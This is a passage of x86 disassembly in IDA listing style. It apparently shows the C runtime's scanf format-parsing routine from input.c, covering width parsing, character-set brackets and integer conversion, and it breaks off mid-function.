var_1E0 = dword ptr -1E0h
var_1DC = dword ptr -1DCh
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = byte ptr -1D0h
var_70 = byte ptr -70h
var_6C = dword ptr -6Ch
var_68 = byte ptr -68h
var_64 = byte ptr -64h
var_60 = byte ptr -60h
var_55 = byte ptr -55h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 224h
push ebx
push esi
push edi
loc_429E9C: ; CODE XREF: sub_429E90+37�j
cmp [ebp+arg_4], 0
jnz short loc_429EC3
push offset aFormatNull ; "format != NULL"
push 0
push 109h
push offset aInput_c ; "input.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_429EC3
int 3 ; Trap to Debugger
loc_429EC3: ; CODE XREF: sub_429E90+10�j
; sub_429E90+30�j
xor eax, eax
test eax, eax
jnz short loc_429E9C
loc_429EC9: ; CODE XREF: sub_429E90+64�j
cmp [ebp+arg_0], 0
jnz short loc_429EF0
push offset dword_43C504
push 0
push 10Ch
push offset aInput_c ; "input.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_429EF0
int 3 ; Trap to Debugger
loc_429EF0: ; CODE XREF: sub_429E90+3D�j
; sub_429E90+5D�j
xor ecx, ecx
test ecx, ecx
jnz short loc_429EC9
mov [ebp+var_28], 0
movsx edx, [ebp+var_28]
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
mov [ebp+var_34], eax
loc_429F07: ; CODE XREF: sub_429E90:loc_42B175�j
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
test edx, edx
jz loc_42B17A
cmp ds:dword_453DF0, 1
jle short loc_429F39
push 8
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cl, [eax]
push ecx
call sub_427040
add esp, 8
mov [ebp+var_1F8], eax
jmp short loc_429F55
; ---------------------------------------------------------------------------
loc_429F39: ; CODE XREF: sub_429E90+8D�j
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx]
mov ecx, ds:off_453BE4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8
mov [ebp+var_1F8], edx
loc_429F55: ; CODE XREF: sub_429E90+A7�j
cmp [ebp+var_1F8], 0
jz short loc_429FA3
mov eax, [ebp+var_20]
sub eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_0]
push edx
lea eax, [ebp+var_20]
push eax
call sub_42B350
add esp, 8
push eax
call sub_42B330
add esp, 8
loc_429F84: ; CODE XREF: sub_429E90+111�j
mov ecx, [ebp+arg_4]
add ecx, 1
mov [ebp+arg_4], ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx]
push eax
call sub_421940
add esp, 4
test eax, eax
jz short loc_429FA3
jmp short loc_429F84
; ---------------------------------------------------------------------------
loc_429FA3: ; CODE XREF: sub_429E90+CC�j
; sub_429E90+10F�j
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
cmp edx, 25h
jnz loc_42B05E
mov [ebp+var_40], 0
mov byte ptr [ebp+var_8], 0
mov [ebp+var_6C], 0
mov eax, [ebp+var_6C]
mov [ebp+var_1E8], eax
mov ecx, [ebp+var_1E8]
mov [ebp+var_1C], ecx
mov [ebp+var_10], 0
mov dl, [ebp+var_10]
mov [ebp+var_68], dl
mov al, [ebp+var_68]
mov [ebp+var_70], al
mov cl, [ebp+var_70]
mov [ebp+var_18], cl
mov dl, [ebp+var_18]
mov [ebp+var_64], dl
mov [ebp+var_14], 0
mov [ebp+var_38], 1
mov [ebp+var_1DC], 0
loc_42A005: ; CODE XREF: sub_429E90:loc_42A15D�j
movsx eax, [ebp+var_18]
test eax, eax
jnz loc_42A162
mov ecx, [ebp+arg_4]
add ecx, 1
mov [ebp+arg_4], ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx]
mov [ebp+var_C], eax
cmp ds:dword_453DF0, 1
jle short loc_42A049
push 4
mov ecx, [ebp+var_C]
and ecx, 0FFh
push ecx
call sub_427040
add esp, 8
mov [ebp+var_1FC], eax
jmp short loc_42A066
; ---------------------------------------------------------------------------
loc_42A049: ; CODE XREF: sub_429E90+19B�j
mov edx, [ebp+var_C]
and edx, 0FFh
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 4
mov [ebp+var_1FC], ecx
loc_42A066: ; CODE XREF: sub_429E90+1B7�j
cmp [ebp+var_1FC], 0
jz short loc_42A096
mov edx, [ebp+var_1E8]
add edx, 1
mov [ebp+var_1E8], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
lea edx, [ecx+eax*4]
mov eax, [ebp+var_C]
lea ecx, [eax+edx*2-30h]
mov [ebp+var_1C], ecx
jmp loc_42A15D
; ---------------------------------------------------------------------------
loc_42A096: ; CODE XREF: sub_429E90+1DD�j
mov edx, [ebp+var_C]
mov [ebp+var_200], edx
mov eax, [ebp+var_200]
sub eax, 2Ah
mov [ebp+var_200], eax
cmp [ebp+var_200], 4Dh
ja loc_42A155
mov edx, [ebp+var_200]
xor ecx, ecx
mov cl, byte_42B1D8[edx]
jmp off_42B1B8[ecx*4]
loc_42A0D0: ; DATA XREF: _0:0042B1BC�o
jmp loc_42A15D
; ---------------------------------------------------------------------------
loc_42A0D5: ; CODE XREF: sub_429E90+239�j
; DATA XREF: _0:0042B1C8�o
mov al, [ebp+var_38]
sub al, 1
mov [ebp+var_38], al
mov cl, [ebp+var_14]
sub cl, 1
mov [ebp+var_14], cl
jmp short loc_42A15D
; ---------------------------------------------------------------------------
loc_42A0E8: ; CODE XREF: sub_429E90+239�j
; DATA XREF: _0:0042B1C0�o
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx+1]
cmp eax, 36h
jnz short loc_42A12A
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx+2]
cmp edx, 34h
jnz short loc_42A12A
mov eax, [ebp+arg_4]
add eax, 2
mov [ebp+arg_4], eax
mov ecx, [ebp+var_1DC]
add ecx, 1
mov [ebp+var_1DC], ecx
mov [ebp+var_30], 0
mov [ebp+var_2C], 0
jmp short loc_42A15D
; ---------------------------------------------------------------------------
loc_42A12A: ; CODE XREF: sub_429E90+263�j
; sub_429E90+270�j
jmp short loc_42A155
; ---------------------------------------------------------------------------
loc_42A12C: ; CODE XREF: sub_429E90+239�j
; DATA XREF: _0:0042B1C4�o
mov dl, [ebp+var_38]
add dl, 1
mov [ebp+var_38], dl
jmp short loc_42A15D
; ---------------------------------------------------------------------------
loc_42A137: ; CODE XREF: sub_429E90+239�j
; DATA XREF: _0:0042B1CC�o
mov al, [ebp+var_38]
add al, 1
mov [ebp+var_38], al
loc_42A13F: ; CODE XREF: sub_429E90+239�j
; DATA XREF: _0:0042B1D0�o
mov cl, [ebp+var_14]
add cl, 1
mov [ebp+var_14], cl
jmp short loc_42A15D
; ---------------------------------------------------------------------------
loc_42A14A: ; CODE XREF: sub_429E90+239�j
; DATA XREF: _0:off_42B1B8�o
mov dl, [ebp+var_70]
add dl, 1
mov [ebp+var_70], dl
jmp short loc_42A15D
; ---------------------------------------------------------------------------
loc_42A155: ; CODE XREF: sub_429E90+225�j
; sub_429E90+239�j ...
mov al, [ebp+var_18]
add al, 1
mov [ebp+var_18], al
loc_42A15D: ; CODE XREF: sub_429E90+201�j
; sub_429E90:loc_42A0D0�j ...
jmp loc_42A005
; ---------------------------------------------------------------------------
loc_42A162: ; CODE XREF: sub_429E90+17B�j
movsx ecx, [ebp+var_70]
test ecx, ecx
jnz short loc_42A185
mov edx, [ebp+arg_8]
mov [ebp+var_1D4], edx
mov eax, [ebp+arg_8]
add eax, 4
mov [ebp+arg_8], eax
mov ecx, [ebp+arg_8]
mov edx, [ecx-4]
mov [ebp+var_3C], edx
loc_42A185: ; CODE XREF: sub_429E90+2D8�j
mov [ebp+var_18], 0
movsx eax, [ebp+var_14]
test eax, eax
jnz short loc_42A1BC
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
cmp edx, 53h
jz short loc_42A1A9
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cl, [eax]
cmp ecx, 43h
jnz short loc_42A1B4
loc_42A1A9: ; CODE XREF: sub_429E90+30B�j
mov dl, [ebp+var_14]
add dl, 1
mov [ebp+var_14], dl
jmp short loc_42A1BC
; ---------------------------------------------------------------------------
loc_42A1B4: ; CODE XREF: sub_429E90+317�j
mov al, [ebp+var_14]
sub al, 1
mov [ebp+var_14], al
loc_42A1BC: ; CODE XREF: sub_429E90+2FF�j
; sub_429E90+322�j
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
or edx, 20h
mov [ebp+var_C], edx
cmp [ebp+var_C], 6Eh
jz short loc_42A20E
cmp [ebp+var_C], 63h
jz short loc_42A1F3
cmp [ebp+var_C], 7Bh
jz short loc_42A1F3
mov eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_20]
push ecx
call sub_42B350
add esp, 8
mov [ebp+var_1D8], eax
jmp short loc_42A20E
; ---------------------------------------------------------------------------
loc_42A1F3: ; CODE XREF: sub_429E90+343�j
; sub_429E90+349�j
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
call sub_42B2D0
add esp, 4
mov [ebp+var_1D8], eax
loc_42A20E: ; CODE XREF: sub_429E90+33D�j
; sub_429E90+361�j
cmp [ebp+var_1E8], 0
jz short loc_42A221
cmp [ebp+var_1C], 0
jz loc_42B02F
loc_42A221: ; CODE XREF: sub_429E90+385�j
mov ecx, [ebp+var_C]
mov [ebp+var_204], ecx
mov edx, [ebp+var_204]
sub edx, 63h
mov [ebp+var_204], edx
cmp [ebp+var_204], 18h
ja loc_42AFDA
mov ecx, [ebp+var_204]
xor eax, eax
mov al, byte_42B24E[ecx]
jmp off_42B226[eax*4]
loc_42A25B: ; DATA XREF: _0:off_42B226�o
cmp [ebp+var_1E8], 0
jnz short loc_42A27C
mov edx, [ebp+var_1E8]
add edx, 1
mov [ebp+var_1E8], edx
mov eax, [ebp+var_1C]
add eax, 1
mov [ebp+var_1C], eax
loc_42A27C: ; CODE XREF: sub_429E90+3D2�j
movsx ecx, [ebp+var_14]
test ecx, ecx
jle short loc_42A28D
mov dl, [ebp+var_64]
add dl, 1
mov [ebp+var_64], dl
loc_42A28D: ; CODE XREF: sub_429E90+3F2�j
mov [ebp+var_1E0], offset dword_454070
mov al, [ebp+var_10]
sub al, 1
mov [ebp+var_10], al
jmp short loc_42A310
; ---------------------------------------------------------------------------
loc_42A2A1: ; CODE XREF: sub_429E90+3C4�j
; DATA XREF: _0:0042B23E�o
movsx ecx, [ebp+var_14]
test ecx, ecx
jle short loc_42A2B2
mov dl, [ebp+var_64]
add dl, 1
mov [ebp+var_64], dl
loc_42A2B2: ; CODE XREF: sub_429E90+417�j
mov [ebp+var_1E0], offset dword_454068
mov al, [ebp+var_10]
sub al, 1
mov [ebp+var_10], al
jmp short loc_42A310
; ---------------------------------------------------------------------------
loc_42A2C6: ; CODE XREF: sub_429E90+3C4�j
; DATA XREF: _0:0042B246�o
movsx ecx, [ebp+var_14]
test ecx, ecx
jle short loc_42A2D7
mov dl, [ebp+var_64]
add dl, 1
mov [ebp+var_64], dl
loc_42A2D7: ; CODE XREF: sub_429E90+43C�j
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
mov [ebp+var_1E0], ecx
mov edx, [ebp+var_1E0]
xor eax, eax
mov al, [edx]
cmp eax, 5Eh
jnz short loc_42A310
mov ecx, [ebp+var_1E0]
add ecx, 1
mov [ebp+var_1E0], ecx
mov dl, [ebp+var_10]
sub dl, 1
mov [ebp+var_10], dl
loc_42A310: ; CODE XREF: sub_429E90+40F�j
; sub_429E90+434�j ...
push 20h
push 0
lea eax, [ebp+var_60]
push eax
call sub_41E4B0
add esp, 0Ch
cmp [ebp+var_C], 7Bh
jnz short loc_42A34C
mov ecx, [ebp+var_1E0]
xor edx, edx
mov dl, [ecx]
cmp edx, 5Dh
jnz short loc_42A34C
mov byte ptr [ebp+var_8], 5Dh
mov eax, [ebp+var_1E0]
add eax, 1
mov [ebp+var_1E0], eax
mov [ebp+var_55], 20h
loc_42A34C: ; CODE XREF: sub_429E90+494�j
; sub_429E90+4A3�j ...
mov ecx, [ebp+var_1E0]
xor edx, edx
mov dl, [ecx]
cmp edx, 5Dh
jz loc_42A4B7
mov eax, [ebp+var_1E0]
mov cl, [eax]
mov byte ptr [ebp+var_1EC], cl
mov edx, [ebp+var_1E0]
add edx, 1
mov [ebp+var_1E0], edx
mov eax, [ebp+var_1EC]
and eax, 0FFh
cmp eax, 2Dh
jnz short loc_42A3A8
mov ecx, [ebp+var_8]
and ecx, 0FFh
test ecx, ecx
jz short loc_42A3A8
mov edx, [ebp+var_1E0]
xor eax, eax
mov al, [edx]
cmp eax, 5Dh
jnz short loc_42A3EE
loc_42A3A8: ; CODE XREF: sub_429E90+4FA�j
; sub_429E90+507�j
mov cl, byte ptr [ebp+var_1EC]
mov byte ptr [ebp+var_8], cl
mov edx, [ebp+var_8]
and edx, 0FFh
sar edx, 3
mov ecx, [ebp+var_1EC]
and ecx, 0FFh
and ecx, 7
mov eax, 1
shl eax, cl
mov cl, [ebp+edx+var_60]
or cl, al
mov edx, [ebp+var_8]
and edx, 0FFh
sar edx, 3
mov [ebp+edx+var_60], cl
jmp loc_42A4B2
; ---------------------------------------------------------------------------
loc_42A3EE: ; CODE XREF: sub_429E90+516�j
mov eax, [ebp+var_1E0]
mov cl, [eax]
mov byte ptr [ebp+var_1EC], cl
mov edx, [ebp+var_1E0]
add edx, 1
mov [ebp+var_1E0], edx
mov eax, [ebp+var_8]
and eax, 0FFh
mov ecx, [ebp+var_1EC]
and ecx, 0FFh
cmp eax, ecx
jge short loc_42A42E
mov dl, byte ptr [ebp+var_1EC]
mov byte ptr [ebp+var_24], dl
jmp short loc_42A43D
; ---------------------------------------------------------------------------
loc_42A42E: ; CODE XREF: sub_429E90+591�j
mov al, byte ptr [ebp+var_8]
mov byte ptr [ebp+var_24], al
mov cl, byte ptr [ebp+var_1EC]
mov byte ptr [ebp+var_8], cl
loc_42A43D: ; CODE XREF: sub_429E90+59C�j
mov dl, byte ptr [ebp+var_8]
mov byte ptr [ebp+var_1EC], dl
jmp short loc_42A456
; ---------------------------------------------------------------------------
loc_42A448: ; CODE XREF: sub_429E90+61C�j
mov al, byte ptr [ebp+var_1EC]
add al, 1
mov byte ptr [ebp+var_1EC], al
loc_42A456: ; CODE XREF: sub_429E90+5B6�j
mov ecx, [ebp+var_1EC]
and ecx, 0FFh
mov edx, [ebp+var_24]
and edx, 0FFh
cmp ecx, edx
jg short loc_42A4AE
mov eax, [ebp+var_1EC]
and eax, 0FFh
sar eax, 3
mov ecx, [ebp+var_1EC]
and ecx, 0FFh
and ecx, 7
mov edx, 1
shl edx, cl
mov al, [ebp+eax+var_60]
or al, dl
mov ecx, [ebp+var_1EC]
and ecx, 0FFh
sar ecx, 3
mov [ebp+ecx+var_60], al
jmp short loc_42A448
; ---------------------------------------------------------------------------
loc_42A4AE: ; CODE XREF: sub_429E90+5DD�j
mov byte ptr [ebp+var_8], 0
loc_42A4B2: ; CODE XREF: sub_429E90+559�j
jmp loc_42A34C
; ---------------------------------------------------------------------------
loc_42A4B7: ; CODE XREF: sub_429E90+4C9�j
mov edx, [ebp+var_1E0]
xor eax, eax
mov al, [edx]
test eax, eax
jnz short loc_42A4CA
jmp loc_42B17A
; ---------------------------------------------------------------------------
loc_42A4CA: ; CODE XREF: sub_429E90+633�j
cmp [ebp+var_C], 7Bh
jnz short loc_42A4D9
mov ecx, [ebp+var_1E0]
mov [ebp+arg_4], ecx
loc_42A4D9: ; CODE XREF: sub_429E90+63E�j
mov edx, [ebp+var_3C]
mov [ebp+var_1E4], edx
mov eax, [ebp+var_20]
sub eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_1D8]
push edx
call sub_42B330
add esp, 8
loc_42A4FE: ; CODE XREF: sub_429E90:loc_42A640�j
cmp [ebp+var_1E8], 0
jz short loc_42A51B
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
test eax, eax
jz loc_42A645
loc_42A51B: ; CODE XREF: sub_429E90+675�j
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
call sub_42B2D0
add esp, 4
mov [ebp+var_1D8], eax
cmp [ebp+var_1D8], 0FFFFFFFFh
jz loc_42A622
mov ecx, [ebp+var_1D8]
sar ecx, 3
movsx edx, [ebp+ecx+var_60]
movsx eax, [ebp+var_10]
xor edx, eax
mov ecx, [ebp+var_1D8]
and ecx, 7
mov eax, 1
shl eax, cl
and edx, eax
test edx, edx
jz loc_42A622
movsx ecx, [ebp+var_70]
test ecx, ecx
jnz loc_42A611
movsx edx, [ebp+var_64]
test edx, edx
jz short loc_42A5FB
mov al, byte ptr [ebp+var_1D8]
mov [ebp+var_1F0], al
mov ecx, [ebp+var_1D8]
and ecx, 0FFh
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 8000h
test eax, eax
jz short loc_42A5CD
mov ecx, [ebp+var_20]
add ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+arg_0]
push edx
call sub_42B2D0
add esp, 4
mov [ebp+var_1EF], al
loc_42A5CD: ; CODE XREF: sub_429E90+720�j
mov eax, ds:dword_453DF0
push eax
lea ecx, [ebp+var_1F0]
push ecx
lea edx, [ebp+var_4]
push edx
call sub_431BA0
add esp, 0Ch
mov eax, [ebp+var_3C]
mov cx, [ebp+var_4]
mov [eax], cx
mov edx, [ebp+var_3C]
add edx, 2
mov [ebp+var_3C], edx
jmp short loc_42A60F
; ---------------------------------------------------------------------------
loc_42A5FB: ; CODE XREF: sub_429E90+6F3�j
mov eax, [ebp+var_3C]
mov cl, byte ptr [ebp+var_1D8]
mov [eax], cl
mov edx, [ebp+var_3C]
add edx, 1
mov [ebp+var_3C], edx
loc_42A60F: ; CODE XREF: sub_429E90+769�j
jmp short loc_42A620
; ---------------------------------------------------------------------------
loc_42A611: ; CODE XREF: sub_429E90+6E7�j
mov eax, [ebp+var_1E4]
add eax, 1
mov [ebp+var_1E4], eax
loc_42A620: ; CODE XREF: sub_429E90:loc_42A60F�j
jmp short loc_42A640
; ---------------------------------------------------------------------------
loc_42A622: ; CODE XREF: sub_429E90+6AD�j
; sub_429E90+6DB�j
mov ecx, [ebp+var_20]
sub ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_1D8]
push eax
call sub_42B330
add esp, 8
jmp short loc_42A645
; ---------------------------------------------------------------------------
loc_42A640: ; CODE XREF: sub_429E90:loc_42A620�j
jmp loc_42A4FE
; ---------------------------------------------------------------------------
loc_42A645: ; CODE XREF: sub_429E90+685�j
; sub_429E90+7AE�j
mov ecx, [ebp+var_1E4]
cmp ecx, [ebp+var_3C]
jz short loc_42A681
movsx edx, [ebp+var_70]
test edx, edx
jnz short loc_42A67F
mov eax, [ebp+var_34]
add eax, 1
mov [ebp+var_34], eax
cmp [ebp+var_C], 63h
jz short loc_42A67F
movsx ecx, [ebp+var_64]
test ecx, ecx
jz short loc_42A679
mov edx, [ebp+var_3C]
mov word ptr [edx], 0
jmp short loc_42A67F
; ---------------------------------------------------------------------------
loc_42A679: ; CODE XREF: sub_429E90+7DD�j
mov eax, [ebp+var_3C]
mov byte ptr [eax], 0
loc_42A67F: ; CODE XREF: sub_429E90+7C6�j
; sub_429E90+7D5�j ...
jmp short loc_42A686
; ---------------------------------------------------------------------------
loc_42A681: ; CODE XREF: sub_429E90+7BE�j
jmp loc_42B17A
; ---------------------------------------------------------------------------
loc_42A686: ; CODE XREF: sub_429E90:loc_42A67F�j
jmp loc_42B024
; ---------------------------------------------------------------------------
loc_42A68B: ; CODE XREF: sub_429E90+3C4�j
; DATA XREF: _0:0042B232�o
mov [ebp+var_C], 64h
loc_42A692: ; CODE XREF: sub_429E90+3C4�j
; DATA XREF: _0:0042B242�o
cmp [ebp+var_1D8], 2Dh
jnz short loc_42A6A6
mov cl, [ebp+var_68]
add cl, 1
mov [ebp+var_68], cl
jmp short loc_42A6AF
; ---------------------------------------------------------------------------
loc_42A6A6: ; CODE XREF: sub_429E90+809�j
cmp [ebp+var_1D8], 2Bh
jnz short loc_42A6EC
loc_42A6AF: ; CODE XREF: sub_429E90+814�j
mov edx, [ebp+var_1C]
sub edx, 1
mov [ebp+var_1C], edx
cmp [ebp+var_1C], 0
jnz short loc_42A6D1
cmp [ebp+var_1E8], 0
jz short loc_42A6D1
mov al, [ebp+var_18]
add al, 1
mov [ebp+var_18], al
jmp short loc_42A6EC
; ---------------------------------------------------------------------------
loc_42A6D1: ; CODE XREF: sub_429E90+82C�j
; sub_429E90+835�j
mov ecx, [ebp+var_20]
add ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+arg_0]
push edx
call sub_42B2D0
add esp, 4
mov [ebp+var_1D8], eax
loc_42A6EC: ; CODE XREF: sub_429E90+81D�j
; sub_429E90+83F�j
cmp [ebp+var_1D8], 30h
jnz loc_42A78E
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42B2D0
add esp, 4
mov [ebp+var_1D8], eax
movsx edx, byte ptr [ebp+var_1D8]
cmp edx, 78h
jz short loc_42A72C
movsx eax, byte ptr [ebp+var_1D8]
cmp eax, 58h
jnz short loc_42A750
loc_42A72C: ; CODE XREF: sub_429E90+88E�j
mov ecx, [ebp+var_20]
add ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+arg_0]
push edx
call sub_42B2D0
add esp, 4
mov [ebp+var_1D8], eax
mov [ebp+var_C], 78h
jmp short loc_42A78E
; ---------------------------------------------------------------------------
loc_42A750: ; CODE XREF: sub_429E90+89A�j
mov eax, [ebp+var_6C]
add eax, 1
mov [ebp+var_6C], eax
cmp [ebp+var_C], 78h
jz short loc_42A768
mov [ebp+var_C], 6Fh
jmp short loc_42A78E
; ---------------------------------------------------------------------------
loc_42A768: ; CODE XREF: sub_429E90+8CD�j
mov ecx, [ebp+var_20]
sub ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_1D8]
push eax
call sub_42B330
add esp, 8
mov [ebp+var_1D8], 30h
loc_42A78E: ; CODE XREF: sub_429E90+863�j
; sub_429E90+8BE�j ...
jmp short loc_42A7EE
; ---------------------------------------------------------------------------
loc_42A790: ; CODE XREF: sub_429E90+3C4�j
; DATA XREF: _0:0042B23A�o
mov [ebp+var_38], 1
loc_42A794: ; CODE XREF: sub_429E90+3C4�j
; DATA XREF: _0:0042B22A�o
cmp [ebp+var_1D8], 2Dh
jnz short loc_42A7A8
mov cl, [ebp+var_68]
add cl, 1
mov [ebp+var_68], cl
jmp short loc_42A7B1
; ---------------------------------------------------------------------------
loc_42A7A8: ; CODE XREF: sub_429E90+90B�j
cmp [ebp+var_1D8], 2Bh
jnz short loc_42A7EE
loc_42A7B1: ; CODE XREF: sub_429E90+916�j
mov edx, [ebp+var_1C]
sub edx, 1
mov [ebp+var_1C], edx
cmp [ebp+var_1C], 0
jnz short loc_42A7D3
cmp [ebp+var_1E8], 0
jz short loc_42A7D3
mov al, [ebp+var_18]
add al, 1
mov [ebp+var_18], al
jmp short loc_42A7EE
; ---------------------------------------------------------------------------
loc_42A7D3: ; CODE XREF: sub_429E90+92E�j
; sub_429E90+937�j
mov ecx, [ebp+var_20]
add ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+arg_0]
push edx
call sub_42B2D0
add esp, 4
mov [ebp+var_1D8], eax
loc_42A7EE: ; CODE XREF: sub_429E90:loc_42A78E�j
; sub_429E90+91F�j ...
cmp [ebp+var_1DC], 0
jz loc_42A9E9
loc_42A7FB: ; CODE XREF: sub_429E90:loc_42A9C4�j
movsx eax, [ebp+var_18]
test eax, eax
jnz loc_42A9C9
cmp [ebp+var_C], 78h
jnz loc_42A896
cmp ds:dword_453DF0, 1
jle short loc_42A836
push 80h
mov ecx, [ebp+var_1D8]
push ecx
call sub_427040
add esp, 8
mov [ebp+var_208], eax
jmp short loc_42A853
; ---------------------------------------------------------------------------
loc_42A836: ; CODE XREF: sub_429E90+988�j
mov edx, [ebp+var_1D8]
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 80h
mov [ebp+var_208], ecx
loc_42A853: ; CODE XREF: sub_429E90+9A4�j
cmp [ebp+var_208], 0
jz short loc_42A889
mov ecx, 4
mov eax, [ebp+var_30]
mov edx, [ebp+var_2C]
call sub_431D80
mov [ebp+var_30], eax
mov [ebp+var_2C], edx
mov edx, [ebp+var_1D8]
push edx
call sub_42B270
add esp, 4
mov [ebp+var_1D8], eax
jmp short loc_42A891
; ---------------------------------------------------------------------------
loc_42A889: ; CODE XREF: sub_429E90+9CA�j
mov al, [ebp+var_18]
add al, 1
mov [ebp+var_18], al
loc_42A891: ; CODE XREF: sub_429E90+9F7�j
jmp loc_42A93D
; ---------------------------------------------------------------------------
loc_42A896: ; CODE XREF: sub_429E90+97B�j
cmp ds:dword_453DF0, 1
jle short loc_42A8B8
push 4
mov ecx, [ebp+var_1D8]
push ecx
call sub_427040
add esp, 8
mov [ebp+var_20C], eax
jmp short loc_42A8D2
; ---------------------------------------------------------------------------
loc_42A8B8: ; CODE XREF: sub_429E90+A0D�j
mov edx, [ebp+var_1D8]
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 4
mov [ebp+var_20C], ecx
loc_42A8D2: ; CODE XREF: sub_429E90+A26�j
cmp [ebp+var_20C], 0
jz short loc_42A935
cmp [ebp+var_C], 6Fh
jnz short loc_42A90D
cmp [ebp+var_1D8], 38h
jge short loc_42A902
mov ecx, 3
mov eax, [ebp+var_30]
mov edx, [ebp+var_2C]
call sub_431D80
mov [ebp+var_30], eax
mov [ebp+var_2C], edx
jmp short loc_42A90B
; ---------------------------------------------------------------------------
loc_42A902: ; CODE XREF: sub_429E90+A58�j
mov dl, [ebp+var_18]
add dl, 1
mov [ebp+var_18], dl
loc_42A90B: ; CODE XREF: sub_429E90+A70�j
jmp short loc_42A933
; ---------------------------------------------------------------------------
loc_42A90D: ; CODE XREF: sub_429E90+A4F�j
mov ecx, 2
mov eax, [ebp+var_30]
mov edx, [ebp+var_2C]
call sub_431D80
add eax, [ebp+var_30]
adc edx, [ebp+var_2C]
mov ecx, 1
call sub_431D80
mov [ebp+var_30], eax
mov [ebp+var_2C], edx
loc_42A933: ; CODE XREF: sub_429E90:loc_42A90B�j
jmp short loc_42A93D
; ---------------------------------------------------------------------------
loc_42A935: ; CODE XREF: sub_429E90+A49�j
mov al, [ebp+var_18]
add al, 1
mov [ebp+var_18], al
loc_42A93D: ; CODE XREF: sub_429E90:loc_42A891�j
; sub_429E90:loc_42A933�j
movsx ecx, [ebp+var_18]
test ecx, ecx
jnz short loc_42A9A8
mov edx, [ebp+var_6C]
add edx, 1
mov [ebp+var_6C], edx
mov eax, [ebp+var_1D8]
sub eax, 30h
cdq
mov ecx, [ebp+var_30]
add ecx, eax
mov eax, [ebp+var_2C]
adc eax, edx
mov [ebp+var_30], ecx
mov [ebp+var_2C], eax
cmp [ebp+var_1E8], 0
jz short loc_42A98B
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
cmp [ebp+var_1C], 0
jnz short loc_42A98B
mov dl, [ebp+var_18]
add dl, 1
mov [ebp+var_18], dl
jmp short loc_42A9A6
; ---------------------------------------------------------------------------
loc_42A98B: ; CODE XREF: sub_429E90+ADF�j
; sub_429E90+AEE�j
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42B2D0
add esp, 4
mov [ebp+var_1D8], eax
loc_42A9A6: ; CODE XREF: sub_429E90+AF9�j
jmp short loc_42A9C4
; ---------------------------------------------------------------------------
loc_42A9A8: ; CODE XREF: sub_429E90+AB3�j
mov edx, [ebp+var_20]
sub edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_1D8]
push ecx
call sub_42B330
add esp, 8
loc_42A9C4: ; CODE XREF: sub_429E90:loc_42A9A6�j
jmp loc_42A7FB
; ---------------------------------------------------------------------------
loc_42A9C9: ; CODE XREF: sub_429E90+971�j
movsx edx, [ebp+var_68]
test edx, edx
jz short loc_42A9E4
mov eax, [ebp+var_30]
neg eax
mov ecx, [ebp+var_2C]
adc ecx, 0
neg ecx
mov [ebp+var_30], eax
mov [ebp+var_2C], ecx
loc_42A9E4: ; CODE XREF: sub_429E90+B3F�j
jmp loc_42AB8D
; ---------------------------------------------------------------------------
loc_42A9E9: ; CODE XREF: sub_429E90+965�j
; sub_429E90:loc_42AB78�j
movsx edx, [ebp+var_18]
test edx, edx
jnz loc_42AB7D
cmp [ebp+var_C], 78h
